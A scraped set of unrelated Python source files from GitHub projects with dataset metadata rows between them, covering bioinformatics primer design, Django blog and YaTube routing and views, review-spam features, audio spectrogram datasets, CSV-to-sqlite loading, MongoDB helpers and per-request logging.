    # the sam object interfaces with the user specified BAM/SAM file!!!
    sam_obj_list = options['rnaseq']
    # iterate through each target exon
    output = [] # output from program
    for line in args_target: # was line in handle
        name, line = line # bad style of reassignment
        tgt = line[0]
        strand = tgt[0]
        tmp_start, tmp_end = get_pos(tgt)
        chr = get_chr(tgt[1:]) # [1:] since strand is first character
        # a target line with 3 fields means the user supplied both flanking exons
        USER_DEFINED_FLANKING_EXONS = True if len(line) == 3 else False
        if USER_DEFINED_FLANKING_EXONS:
            up_exon = utils.get_pos(line[1]) # user's upstream exon
            down_exon = utils.get_pos(line[2]) # user's downstream exon
        else:
            up_exon = None # user did not provide upstream exon
            down_exon = None # user did not provide downstream exon
        # This try block is to catch assertions made about the graph. If a
        # PrimerSeqError is raised it only impacts a single target for primer
        # design so complete exiting of the program is not warranted.
        try:
            # if the gtf doesn't have a valid gene_id attribute then use
            # the first method otherwise use the second method.
            if options['no_gene_id']:
                gene_dict, gene_name = get_weakly_connected_tx(args_gtf, strand, chr, tmp_start, tmp_end) # hopefully filter out junk
            else:
                gene_dict, gene_name = get_from_gtf_using_gene_name(args_gtf, strand, chr, tmp_start, tmp_end)
            # extract all edge weights only once
            edge_weights_list = [sam_obj.extractSamRegion(chr, gene_dict['start'], gene_dict['end'])
                                 for sam_obj in sam_obj_list]
            # The following options['both_flag'] determines how the splice graph is constructed.
            # The splice graph can be either constructed from annotation junctions
            # where options['both_flag']==False or RNA-Seq + annotation junctions when
            # options['both_flag']==True.
            # single pooled count data splice graph
            splice_graph = construct_splice_graph(edge_weights_list,
                                                  gene_dict,
                                                  chr,
                                                  strand,
                                                  options['read_threshold'],
                                                  options['min_jct_count'],
                                                  output_type='single',
                                                  both=options['both_flag'])
            # Second, get a splice graph for each BAM file
            single_bam_splice_graphs = construct_splice_graph(edge_weights_list,
                                                              gene_dict,
                                                              chr,
                                                              strand,
                                                              options['read_threshold'],
                                                              options['min_jct_count'],
                                                              output_type='list',
                                                              both=options['both_flag'])
            ### Logic for choosing methodology of primer design ###
            # user-defined flanking exon case
            if up_exon and down_exon:
                # all three exons must exist in the annotation before proceeding
                if gene_dict['target'] not in gene_dict['exons']:
                    raise utils.PrimerSeqError('Error: target exon was not found in gtf annotation')
                elif up_exon not in gene_dict['exons']:
                    raise utils.PrimerSeqError('Error: upstream exon not in gtf annotation')
                elif down_exon not in gene_dict['exons']:
                    raise utils.PrimerSeqError('Error: downstream exon not in gtf annotation')
                tmp = predefined_exons_case(name, # ID for exon (need to save as json)
                                            gene_dict['target'], # target exon tuple (start, end)
                                            splice_graph, # SpliceGraph object
                                            genome, # pygr genome variable
                                            up_exon, # upstream flanking exon
                                            down_exon) # downstream flanking exon
            # always included case
            elif options['psi'] > .9999:
                # note this function ignores edge weights
                tmp = get_flanking_biconnected_exons(tgt, gene_dict['target'],
                                                     splice_graph,
                                                     genome)
            # user specified a sufficient psi value to call constitutive exons
            else:
                tmp = get_sufficient_psi_exons(tgt, gene_dict['target'],
                                               splice_graph,
                                               genome,
                                               name,
                                               options['psi'],
                                               up_exon,
                                               down_exon) # note, this function utilizes edge wieghts
            ### End methodology specific primer design ###
            # Error msgs are of length one, so only do psi calculations for
            # non-error msgs
            if len(tmp) > 1:
                # edit target psi value
                tmp_all_paths = tmp[-4] # CAREFUL the index for the AllPaths object may change
                tmp[2] = calculate_target_psi(gene_dict['target'],
                                              single_bam_splice_graphs,
                                              tmp_all_paths.component,
                                              up_exon=None,
                                              down_exon=None)
                # up_exon=up_exon,
                # down_exon=down_exon) # CAREFUL index for psi_target may change
                tmp.append(gene_name)
                # append result to output list
                output.append(tmp)
        except (utils.PrimerSeqError,):
            # per-target failure: record the message and continue with the
            # remaining targets instead of aborting the whole run
            t, v, trace = sys.exc_info()
            output.append([str(v)]) # just append assertion msg
    return output
if __name__ == '__main__':
    # Running this script directly is only for debug purposes.
    # (The bare string "docstring" that used to sit here was a no-op
    # statement, not a docstring -- replaced with a real comment.)
    # process command line arguments
    parser = argparse.ArgumentParser(description='Get flanking constitutive exons')
    parser.add_argument('-b', '--big-bed', action='store', dest='big_bed', required=True,
                        help='annotation file with legitimate gene_id\'s')
    parser.add_argument('-t', '--target', action='store', dest='target', required=True,
                        help='file of list of coordinate targets')
    parser.add_argument('-f', '--fasta', action='store', dest='fasta', required=True)
    group = parser.add_mutually_exclusive_group(required=True)
    # BUG FIX: the flag was misspelled '--annotaton'; register the correct
    # spelling and keep the misspelled form as an alias so existing scripts
    # that used the old flag keep working.
    group.add_argument('--annotation', '--annotaton', dest='annotation_flag', action='store_true')
    group.add_argument('--rnaseq', dest='rnaseq_flag', action='store_true')
    group.add_argument('--both', dest='both_flag', action='store_true')
    parser.add_argument('--psi', dest='psi', action='store', type=float)
    parser.add_argument('--read-threshold', dest='read_threshold', type=int, action='store')
    parser.add_argument('-o', '--output', action='store', dest='output', required=True)
    options = vars(parser.parse_args())
    options['target'] = options['target'].replace('dash', '-').split(',') # fix bug with - as input for strand
    # call main function
    main(options, options['output'])
| ctokheim/PrimerSeq | splice_graph.py | splice_graph.py | py | 24,773 | python | en | code | 11 | github-code | 36 | [
{
"api_name": "networkx.DiGraph",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "networkx.DiGraph",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "utils.PrimerSeqError",
"line_number": 118,
"usage_type": "call"
},
{
"api_name": "networkx.weak... |
2849684748 | from django.urls import path
from .views import blog_post,\
blogview,\
search_blog, \
all_blog, \
post_detail,\
createpost, \
updatepost
urlpatterns = [
    path('', blogview, name='blogview'),
    path('create-post', createpost, name='create-post'),
    path('all-blog', all_blog, name='all-blog'),
    path('all-blog/<id>', blog_post, name='blog-post'),
    # BUG FIX: 'search-blog' must be registered before the catch-all
    # '<id>' route -- Django matches patterns in order, so '<id>' was
    # capturing the literal path 'search-blog' and the search view was
    # unreachable.
    path('search-blog', search_blog, name='search-blog'),
    path('<id>', post_detail, name='post-detail'),
    path('<id>/post-update', updatepost, name='update-post'),
]
| myfrank4everreal/baronshoes_v_2.0 | blog/urls.py | urls.py | py | 585 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "views.blogview",
"line_number": 12,
"usage_type": "argument"
},
{
"api_name": "django.urls.path",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "views.createpost... |
75321076905 | from modules.amazon_parser import *
from collections import defaultdict
from cosine_sim import cosine_sim
reviews = parserJSON('./library/amazon-review-data.json',)
"""
keys of reviews
`Rate`
`reviewText`
`video`
`verifiedPurchase`
`Date`
`productId`
`reviewId`
`memberId`
`reviewTitle`
"""
#rating for product p given by certain user 'm' and average given by other users.
####IRD####
def IRD(reviews):
    """Compute the Individual Rating Deviation (IRD) for every
    (reviewer, product) pair.

    For each review, IRD measures how far the reviewer's rating deviates
    from the average rating that all *other* reviewers gave the same
    product, normalised by the maximum possible deviation (4 on a 1-5
    star scale):

        IRD = (user_rating - avg_other_users_rating) / 4

    Parameters
    ----------
    reviews : iterable of dict
        each dict must provide the keys ``productId``, ``memberId`` and
        ``Rate``; entries whose productId or memberId is the literal
        string "None" are skipped.

    Returns
    -------
    defaultdict
        nested mapping ``{memberId: {productId: IRD}}``; missing keys
        default to 0.
    """
    # per-product totals: {"productId": {"review_counts": int, "cumulative_score": number}}
    productRatingDictionary = defaultdict(lambda: {"review_counts": 0, "cumulative_score": 0})
    # per-reviewer list of (productId, rating) pairs
    customerToProductDictionary = defaultdict(lambda: [])
    customerIRD = defaultdict(lambda: defaultdict(lambda: 0))
    for review in reviews:  # build up dictionaries
        if review["productId"] != "None" and review["memberId"] != "None":
            productRatingDictionary[review["productId"]]["cumulative_score"] += review["Rate"]
            productRatingDictionary[review["productId"]]["review_counts"] += 1
            # NOTE: a reviewer who rates the same product repeatedly adds
            # several entries here; the last rating wins in customerIRD below.
            customerToProductDictionary[review["memberId"]].append((review["productId"], review["Rate"]))
    for UserID in customerToProductDictionary:
        for product in customerToProductDictionary[UserID]:
            ProductID = product[0]
            UserRating = product[1]
            try:
                # average rating of all *other* users for this product
                AvgProductRating = ((productRatingDictionary[ProductID]["cumulative_score"] - UserRating)
                                    / (productRatingDictionary[ProductID]["review_counts"] - 1))
            except ZeroDivisionError:
                # sole reviewer of this product: deviation is defined as 0
                AvgProductRating = UserRating
            customerIRD[UserID][ProductID] = (UserRating - AvgProductRating) / 4
    return customerIRD
####ICS####
def ICS(reviews):
    """Compute the Intra-Customer Similarity (ICS) per (reviewer, product).

    For every reviewer who left more than one review text on the same
    product, ICS is the average pairwise cosine similarity between those
    texts (pairs of byte-identical texts are excluded by the ``i != j``
    string comparison, matching the original behaviour).

    Returns a nested defaultdict ``{memberId: {productId: ICS}}``
    defaulting to 0.
    """
    customerToProductDictionary = defaultdict(lambda: defaultdict(lambda: []))
    ICS_Dictionary = defaultdict(lambda: defaultdict(lambda: 0))
    for review in reviews:  # build up dictionaries
        if review["productId"] != "None" and review["memberId"] != "None":
            customerToProductDictionary[review["memberId"]][review["productId"]].append(review["reviewText"])
    for member in customerToProductDictionary:
        for productId in customerToProductDictionary[member]:
            total_sim = 0
            cnt = 0
            texts = customerToProductDictionary[member][productId]
            if len(texts) > 1:  # the same member reviewed this product repeatedly
                for i in texts:
                    for j in texts:
                        if i != j:
                            # BUG FIX: accumulate the similarities. The original
                            # assigned (temp = cosine_sim(i, j)), so only the
                            # last pair was divided by cnt and the "average"
                            # below was wrong for more than two reviews.
                            total_sim += cosine_sim(i, j)
                            cnt += 1
            if cnt != 0:
                ICS_Dictionary[member][productId] = 1.0 * total_sim / cnt  # take average
    return ICS_Dictionary
| josiahcoad/Faker | individual_kevin.py | individual_kevin.py | py | 3,188 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "collections.defaultdict",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 28,
"usage_type": "call"
},
{
"api_name"... |
70596977383 | #Create a dataset of normalised spectrograms from files
import os
import numpy as np
import librosa
import audiofile as af
import configparser
from utils.audioTools import getSpectro
debugFlag = False
def main():
    """Create a dataset of normalised spectrograms from the files in ``data/``.

    Reads dataset parameters from ``config.cfg`` (or ``configTest.cfg``
    when the module-level ``debugFlag`` is set), converts every audio
    file found under ``data/`` to a spectrogram via ``getSpectro`` and
    saves it as a .npy file, randomly split roughly 80/20 between
    ``<dsName>/train`` and ``<dsName>/test``.

    Returns
    -------
    int
        0 on success, -1 if the output folder already exists.
    """
    config = configparser.ConfigParser()
    if debugFlag == True:
        config.read(r'configTest.cfg')
    else:
        config.read(r'config.cfg')
    dsName = config.get('Dataset', 'name')
    fftLength = int(config.get('Dataset', 'fftLength'))
    nFreq = int(config.get('Dataset', 'nFreq'))  # read for config validation; not used below
    numFeatures = int(config.get('Dataset', 'numFeatures'))  # read for config validation; not used below
    # Might want to rename data to fit whatever user might want
    musicFiles = [os.path.join(path, name) for path, subdirs, files in os.walk("data/") for name in files]
    # If folder already exists, quit
    if os.path.exists(dsName):
        print("ERROR: The folder '" + dsName + "' already exists ! either delete it or rename it and try again")
        # BUG FIX: this early return was commented out, so the script kept
        # running and silently mixed new spectrograms into the old dataset.
        return -1
    # Else create folder structure
    os.makedirs(dsName)
    os.makedirs(dsName + "/train")
    os.makedirs(dsName + "/test/")
    for i, song in enumerate(musicFiles):
        S = getSpectro(song, fftLength)
        # And save: ~20% of files go to the test split, the rest to train
        if np.random.uniform(0, 1) > 0.8:
            print("Saving " + dsName + "/test/" + os.path.basename(song)[:-4] + ".npy")
            print("[", i + 1, "/", len(musicFiles), "]")
            np.save(dsName + "/test/" + os.path.basename(song)[:-4] + ".npy", S)
        else:
            print("Saving " + dsName + "/train/" + os.path.basename(song)[:-4] + ".npy")
            print("[", i + 1, "/", len(musicFiles), "]")
            np.save(dsName + "/train/" + os.path.basename(song)[:-4] + ".npy", S)
        if debugFlag == True:
            # debug mode saves every file to both splits
            np.save(dsName + "/test/" + os.path.basename(song)[:-4] + ".npy", S)
            np.save(dsName + "/train/" + os.path.basename(song)[:-4] + ".npy", S)
    return 0
if __name__ == "__main__":
    # entry point: build the spectrogram dataset when run as a script
    main()
| epsln/chiner | utils/makeDS.py | makeDS.py | py | 1,952 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "configparser.ConfigParser",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "os.walk",
"li... |
15287830329 | ##encoding=UTF8
"""
author: Sanhe Hu
compatibility: python3 ONLY
prerequisites: angora.SQLITE
import:
from angora.PandasSQL.sqlite3blackhole import CSVFile, Sqlite3BlackHole
"""
from __future__ import print_function
from angora.SQLITE.core import MetaData, Sqlite3Engine, Table, Column, DataType
from angora.DATA.timewrapper import TimeWrapper
from angora.GADGET.logger import Messenger, Log
from collections import deque
import pandas as pd, numpy as np
class CSVFile():
    """a CSV datafile class

    [args]
    ------
    path:
        csv file absolute path
    table_name:
        the table name you map the csv data to
    sep:
        csv separator, default ','
    header:
        has header?
    usecols:
        a index list tells which columns you want to use. for example [1, 4, 5] means
        you only use the second, fifth and sixth columns
    dtype:
        define the data type for each columns in a dictionary. valid dtypes are:
        TEXT, INTEGER, REAL, DATE, DATETIME
        example: {"column_name1": "TEXT", "column_name2": "INTEGER"}
    primary_key_columns:
        a index list tells which columns are primary keys. for example you use [1, 4, 5] for
        usecols. and you use [2] for primary_key_columns. means the sixth columns is primary key.
    """
    def __init__(self, path,
                 table_name = None,
                 sep = ",",
                 header = None,
                 usecols = None,
                 dtype = dict(),
                 primary_key_columns = list()):
        # NOTE(review): dict()/list() defaults are evaluated once and shared
        # across calls; they are never mutated here (a new list is built for
        # primary_key_columns), but be careful when modifying this code.
        self.path = path
        self.table_name = table_name
        self.sep = sep
        if header:
            self.header = 0
        else:
            self.header = None
        self.usecols = usecols
        self.dtype = dtype
        # Coerce every primary-key column index to a string so that it matches
        # the generated column names ("c" + index, e.g. 1 -> "c1") and is a
        # legal identifier in the database table.
        self.primary_key_columns = list()
        for i in primary_key_columns:
            if not isinstance(i, str):
                self.primary_key_columns.append("c" + str(i))
            else:
                self.primary_key_columns.append(i)
        self._read_metadata()
        # timewrapper is injected later by Sqlite3BlackHole.add(); it must be
        # set before generate_records() is called on a file with DATE/DATETIME
        # columns.
        self.timewrapper = None
    def _read_metadata(self):
        """construct the metadata for creating the database table

        Reads a single row of the csv to discover column names/dtypes,
        derives the sqlite3 column types (user-declared types win, the
        rest are inferred from pandas dtypes) and builds the Table object.
        """
        self.metadata = MetaData()
        datatype = DataType()
        ### map the CSV.dtype definition to pandas.read_csv dtype and sqlite3 dtype
        _pd_dtype_mapping = {"TEXT": np.str, "INTEGER": np.int64,
                             "REAL": np.float64,
                             "DATE": np.str, "DATETIME": np.str}
        _db_dtype_mapping = {"TEXT": datatype.text, "INTEGER": datatype.integer,
                             "REAL": datatype.real,
                             "DATE": datatype.date, "DATETIME": datatype.datetime}
        # NOTE(review): np.str/np.object/np.int/np.float were removed in
        # NumPy >= 1.24; this code assumes an older NumPy -- verify before
        # upgrading dependencies.
        pd_dtype = dict() # {"column_name": dtype} for part of columns, other columns using default setting
        db_dtype = dict() # {"column_name": dtype} for all columns
        for column_name, data_type in self.dtype.items():
            if data_type in _pd_dtype_mapping:
                pd_dtype[column_name] = _pd_dtype_mapping[data_type]
            if data_type in _db_dtype_mapping:
                db_dtype[column_name] = _db_dtype_mapping[data_type]
        ### Read one row, and extract column information from csv
        if self.usecols:
            df = pd.read_csv(self.path, sep=self.sep, header=self.header,
                             nrows=1, dtype=pd_dtype, usecols=self.usecols)
        else:
            df = pd.read_csv(self.path, sep=self.sep, header=self.header,
                             nrows=1, dtype=pd_dtype)
        # Coerce non-string column labels to strings ("c" + index) so that the
        # dataframe columns equal the database column names and are legal
        # identifiers.
        new_columns = list()
        for i in df.columns:
            if not isinstance(i, str):
                new_columns.append("c" + str(i))
            else:
                new_columns.append(i)
        df.columns = new_columns
        ### Define the right data type in database for each column
        # (only for columns the user did not declare explicitly)
        for column_name, data_type in zip(df.columns, df.dtypes):
            if column_name not in db_dtype:
                if data_type in [np.object,]:
                    db_dtype.setdefault(column_name, datatype.text)
                elif data_type in [np.int64, np.int32, np.int16, np.int8, np.int0, np.int]:
                    db_dtype.setdefault(column_name, datatype.integer)
                elif data_type in [np.float64, np.float32, np.float16, np.float]:
                    db_dtype.setdefault(column_name, datatype.real)
        self.pd_dtype = pd_dtype
        self.db_dtype = db_dtype
        ### Construct Database.Table Metadata
        columns = list()
        for column_name, data_type in zip(df.columns, df.dtypes):
            if column_name in self.primary_key_columns:
                primary_key_flag = True
            else:
                primary_key_flag = False
            columns.append(Column(column_name, db_dtype[column_name], primary_key=primary_key_flag))
        Table(self.table_name, self.metadata, *columns)
        self.table = self.metadata.tables[self.table_name]
    def generate_records(self, chunksize=1000*1000):
        """generator for sqlite3 database friendly record from a data file

        Streams the csv in chunks of *chunksize* rows and yields one
        record (row array) at a time; DATE/DATETIME columns are converted
        to ISO strings via ``self.timewrapper`` (set by
        Sqlite3BlackHole.add()).
        """
        if self.usecols:
            for df in pd.read_csv(self.path,
                                  sep=self.sep,
                                  header=self.header,
                                  dtype=self.pd_dtype,
                                  usecols=self.usecols,
                                  iterator=True,
                                  chunksize=chunksize):
                for column_name, dtype in self.db_dtype.items(): # convert the dtype of DATE and DATETIME columns
                    if dtype.name == "DATE": # convert to ISO date string
                        df[column_name] = df[column_name].apply(self.timewrapper.isodatestr)
                    if dtype.name == "DATETIME": # convert to ISO datetime string
                        df[column_name] = df[column_name].apply(self.timewrapper.isodatetimestr)
                for record in df.values:
                    yield record
        else:
            for df in pd.read_csv(self.path,
                                  sep=self.sep,
                                  header=self.header,
                                  dtype=self.pd_dtype,
                                  iterator=True,
                                  chunksize=chunksize):
                for column_name, dtype in self.db_dtype.items(): # convert the dtype of DATE and DATETIME columns
                    if dtype.name == "DATE": # convert to ISO date string
                        df[column_name] = df[column_name].apply(self.timewrapper.isodatestr)
                    if dtype.name == "DATETIME": # convert to ISO datetime string
                        df[column_name] = df[column_name].apply(self.timewrapper.isodatetimestr)
                for record in df.values:
                    yield record
class Sqlite3BlackHole():
    """A CSV-data-to-Sqlite3 loader ("black hole").

    Takes CSVFile objects into the database in two modes:
    1. devour: map a CSV file to a table; on sqlite3.IntegrityError the
       offending record is skipped
    2. update: like devour, but on sqlite3.IntegrityError the existing
       row is updated instead

    Typical usage:

        sqlite3blackhole = Sqlite3BlackHole("your_sqlite3_database_name.db")
        csvfile = CSVFile(r"test_data/employee1.txt",
                          table_name="employee",
                          sep=",",
                          header=True,
                          dtype={"employee_id": "TEXT", "start_date": "DATE"},
                          primary_key_columns=["employee_id"])
        sqlite3blackhole.add(csvfile)
        ... add more files ...
        sqlite3blackhole.devour()
    """
    def __init__(self, dbname):
        self.engine = Sqlite3Engine(dbname)   # sqlite3 connection wrapper
        self.metadata = MetaData()
        self.pipeline = deque()               # queue of data files waiting to be loaded
        self.timewrapper = TimeWrapper()      # shared date/datetime string converter
        self.messenger = Messenger()          # console progress output
        self.log = Log()                      # failure log
    def add(self, datafile):
        """add datafile object to data pipeline
        """
        # share one TimeWrapper instance so all files use the same converter
        datafile.timewrapper = self.timewrapper
        self.pipeline.append(datafile)
    def _process_pipeline(self, insert_method):
        """Drain the pipeline, loading each file with *insert_method*.

        A file that fails to load is recorded in the failure log and does
        not abort the remaining files.
        """
        while len(self.pipeline) >= 1:
            self.messenger.show("%s files to process..." % len(self.pipeline))
            datafile = self.pipeline.popleft()
            self.messenger.show("now processing %s..." % datafile.path)
            datafile.metadata.create_all(self.engine)
            try:
                ins = datafile.table.insert()
                insert_method(ins, datafile.generate_records())
                self.messenger.show("\tfinished!")
            except Exception:
                # BUG FIX: this was a bare `except:` which also swallowed
                # KeyboardInterrupt/SystemExit; only genuine errors should
                # send the file to the failure log.
                self.log.write(datafile.path)
    def devour(self):
        """if sqlite3.IntegrityError been raised, skip the record.
        """
        self._process_pipeline(self.engine.insert_many_records)
    def update(self):
        """unlike Sqlite3BlackHole.devour(), if sqlite3.IntegrityError been raised,
        update the record.
        """
        self._process_pipeline(self.engine.insert_and_update_many_records)
| MacHu-GWU/Angora | angora/PandasSQL/sqlite3blackhole.py | sqlite3blackhole.py | py | 10,015 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "angora.SQLITE.core.MetaData",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "angora.SQLITE.core.DataType",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "numpy.str",
"line_number": 78,
"usage_type": "attribute"
},
{
"api_name":... |
9587688117 | # -*- coding: utf-8 -*-
import Jarvis
import colorama
import sys
def check_python_version():
    """Return True when running under a Python 3 interpreter."""
    return sys.version_info.major == 3
def main():
    """Initialise terminal colours, build a Jarvis instance and execute
    the command assembled from the command-line arguments."""
    # enable color on windows
    colorama.init()
    # start Jarvis
    jarvis = Jarvis.Jarvis()
    # everything after the program name is joined into one Jarvis command
    command = " ".join(sys.argv[1:]).strip()
    jarvis.executor(command)
if __name__ == '__main__':
    # Jarvis supports Python 3 only; refuse to start otherwise.
    if check_python_version():
        main()
    else:
        print("Sorry! Only Python 3 supported.")
| sukeesh/Jarvis | jarviscli/__main__.py | __main__.py | py | 451 | python | en | code | 2,765 | github-code | 36 | [
{
"api_name": "sys.version_info",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "colorama.init",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "Jarvis.Jarvis",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line... |
11232703752 | from django.shortcuts import render, get_object_or_404
from .models import Post, Group
def index(request):
    """YaTube main page: render the ten most recent posts."""
    latest_posts = Post.objects.order_by('-pub_date')[:10]
    return render(request, 'posts/index.html', {'posts': latest_posts})
def group_posts(request, slug):
    """YaTube group page: render up to ten posts of the group with the
    given slug (404 if the group does not exist)."""
    group = get_object_or_404(Group, slug=slug)
    group_post_list = group.posts.all()[:10]
    return render(request, 'posts/group_list.html', {
        'group': group,
        'posts': group_post_list,
    })
| semenov-max/yatube_project | yatube/posts/views.py | views.py | py | 620 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "models.Post.objects.order_by",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "models.Post.objects",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "models.Post",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "django... |
23640743170 | from pymongo import MongoClient
from config import DB_USER, DB_PASSWORD, DB_IP_ADDR, DB_AUTH_SOURCE
from console import console, Progress
from time import sleep
def connect_to_db():
    """Connect to MongoDB and return the client.

    Prints progress to the console. On failure the error status is
    printed and the original exception is re-raised -- the previous
    version swallowed the error with a bare except and then crashed
    with a NameError on ``return client``.
    """
    console.print("Підключення до бази даних...", end="")
    try:
        client = MongoClient(DB_IP_ADDR, username=DB_USER, password=DB_PASSWORD, authSource=DB_AUTH_SOURCE, authMechanism='SCRAM-SHA-256', tls=True, tlsAllowInvalidCertificates=True)
    except Exception:
        # narrowed from a bare except; report and propagate the real error
        console.print(f"[black on red]ПОМИЛКА[/]")
        raise
    console.print(f"[black on green]УСПІШНО[/]")
    return client
def use_vst(client):
    """Return the 'vst' database from the given Mongo client,
    printing a success/failure status to the console."""
    console.print("Пошук бази... ", end="")
    try:
        database = client["vst"]
        console.print(f"[black on green]УСПІШНО[/]")
    except:
        console.print(f"[black on red]ПОМИЛКА[/]")
    return database
def get_collection(vst, collection):
    """Return the named collection from the 'vst' database,
    printing a success/failure status to the console."""
    console.print(f"Пошук колекції {collection}... ", end="")
    try:
        result = vst[collection]
        console.print(f"[black on green]УСПІШНО[/]")
    except:
        console.print(f"[black on red]ПОМИЛКА[/]")
    return result
def update_specs(vst, spec_list):
    """Rebuild the 'specs' collection from (code, name) pairs.

    Any existing 'specs' collection is dropped first; one document per
    speciality is then bulk-inserted while a progress bar is shown.
    """
    def _insert():
        # build all documents first, then insert them in a single bulk call
        with Progress() as prog:
            task = prog.add_task("[light_sea_green]Оновлення...", total=len(spec_list)+3)
            docs = []
            for spec in spec_list:
                docs.append({"code": spec[0], "name": spec[1]})
                sleep(0.002)  # purely cosmetic: lets the progress bar animate
                prog.update(task, advance=1)
            specs.insert_many(docs)
            prog.update(task, advance=3)
    console.print("Оновлення списку спеціальностей... ", end="")
    # drop any stale collection before re-creating it
    # (the duplicated if/else assignment of `specs` was collapsed, and the
    # dead commented-out insert_one() call was removed)
    if "specs" in vst.list_collection_names():
        vst["specs"].drop()
    specs = vst["specs"]
    console.print(f"[black on blue]ПЕРЕДАНО[/]")
    _insert()
def update_univs(vst, udata):
    """Rebuild the 'univs' collection from the given list of documents."""
    def _insert():
        univs.insert_many(udata)
        console.print(f"[black on green]УСПІШНО[/]")
    # BUG FIX: the status message said "спеціальностей" (specialities),
    # copy-pasted from update_specs; this function updates universities.
    console.print("Оновлення списку університетів... ", end="")
    # drop any stale collection before re-creating it
    # (the duplicated if/else assignment of `univs` was collapsed)
    if "univs" in vst.list_collection_names():
        vst["univs"].drop()
    univs = vst["univs"]
    _insert()
| WebUraXalys/vstupBot | parser/db.py | db.py | py | 2,401 | python | uk | code | 0 | github-code | 36 | [
{
"api_name": "console.console.print",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "console.console",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "pymongo.MongoClient",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "config.DB_IP_... |
18876976348 | # coding=utf-8
import copy
import logging
import traceback
import time
import socket
from collections import namedtuple
from functools import partial
from logging.handlers import SysLogHandler, WatchedFileHandler
import tornado.options
from tornado.options import options
from tornado.escape import to_unicode
try:
    import frontik.options
    from graypy.handler import GELFHandler, LAN_CHUNK
    class BulkGELFHandler(GELFHandler):
        """GELF handler that sends one aggregated graylog message per
        request instead of one message per log record."""
        @staticmethod
        def format_time(record):
            # "YYYY-mm-dd HH:MM:SS,mmm" timestamp for a single record
            t = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(record.created))
            return "%s,%03d" % (t, record.msecs)
        def handle_bulk(self, records_list, stages=None, status_code=None, uri=None, method=None, **kwargs):
            """Collapse all records of one request into a single GELF message.

            The aggregate record carries the request line as the short
            message, the most severe level seen, the concatenated log
            text, the last exception (if any) and one extra field per
            timing stage.
            """
            if len(records_list) > 0:
                first_record = records_list[0]
            else:
                return
            # use a deep copy of the first record as the aggregate carrier
            record_for_gelf = copy.deepcopy(first_record)
            record_for_gelf.message = u''
            record_for_gelf.exc_info = None
            record_for_gelf.short = u"{0} {1} {2}".format(method, to_unicode(uri), status_code)
            record_for_gelf.levelno = logging.INFO
            record_for_gelf.name = None
            record_for_gelf.code = status_code
            for record in records_list:
                # take the logger name from the first record that knows its handler
                if record_for_gelf.name is None and hasattr(record, 'handler'):
                    record_for_gelf.name = repr(record.handler)
                message = to_unicode(record.getMessage())
                # escalate to the most severe record seen so far; its message
                # becomes the short text
                if record.levelno > record_for_gelf.levelno:
                    record_for_gelf.levelno = record.levelno
                    record_for_gelf.lineno = record.lineno
                    record_for_gelf.short = message
                # only the last exception will be sent in exc_info
                if record.exc_info is not None:
                    exception_text = u'\n' + u''.join(map(to_unicode, traceback.format_exception(*record.exc_info)))
                    record_for_gelf.exc_info = record.exc_info
                    record_for_gelf.short += exception_text
                record_for_gelf.message += u' {time} {level} {msg} \n'.format(
                    time=self.format_time(record), level=record.levelname, msg=message
                )
            # attach per-stage timings as extra GELF fields (whole milliseconds)
            if stages is not None:
                for s in stages:
                    setattr(record_for_gelf, s.name + '_stage', str(int(s.delta)))
            GELFHandler.handle(self, record_for_gelf)
            GELFHandler.close(self)
except ImportError:
    # graypy is not installed -- force graylog output off
    import frontik.options
    options.graylog = False
# module-level logger shared by all request handlers
log = logging.getLogger('frontik.handler')


class ContextFilter(logging.Filter):
    """Appends the per-request id (when present) to the record's logger name."""

    def filter(self, record):
        request_id = getattr(record, 'request_id', None)
        name_parts = [part for part in (record.name, request_id) if part]
        record.name = '.'.join(name_parts)
        return True


log.addFilter(ContextFilter())
class PerRequestLogBufferHandler(logging.Logger):
    """Logger that buffers every LogRecord of the current request.

    Each record is forwarded to the module-level ``log`` immediately and
    also kept in ``records_list`` so that registered bulk handlers can
    process the whole request's records at once when the request ends.
    """

    def __init__(self, name, level=logging.NOTSET):
        super(PerRequestLogBufferHandler, self).__init__(name, level)
        self.records_list = []   # every record emitted during the request
        self.bulk_handlers = []  # (handler, auto_flush) pairs

    def handle(self, record):
        # forward to the shared logger first, then remember the record
        log.handle(record)
        self.records_list.append(record)

    def add_bulk_handler(self, handler, auto_flush=True):
        """Register *handler*; non-auto-flush handlers get a bound flush()."""
        self.bulk_handlers.append((handler, auto_flush))
        if not auto_flush:
            handler.flush = partial(self.flush_bulk_handler, handler)

    def flush_bulk_handler(self, handler, **kwargs):
        handler.handle_bulk(self.records_list, **kwargs)

    def flush(self, **kwargs):
        # only handlers registered with auto_flush are flushed here;
        # the others flush themselves via the bound flush() above
        for bulk_handler, should_auto_flush in self.bulk_handlers:
            if should_auto_flush:
                self.flush_bulk_handler(bulk_handler, **kwargs)
class RequestLogger(logging.LoggerAdapter):
    """Per-request logger adapter.

    Wraps a PerRequestLogBufferHandler so every record of one HTTP
    request is buffered, tags records with the request id via ``extra``
    and keeps per-request timing "stages".
    """
    # name: stage label; delta: stage duration in ms;
    # start_delta: offset of the stage start from request start in ms
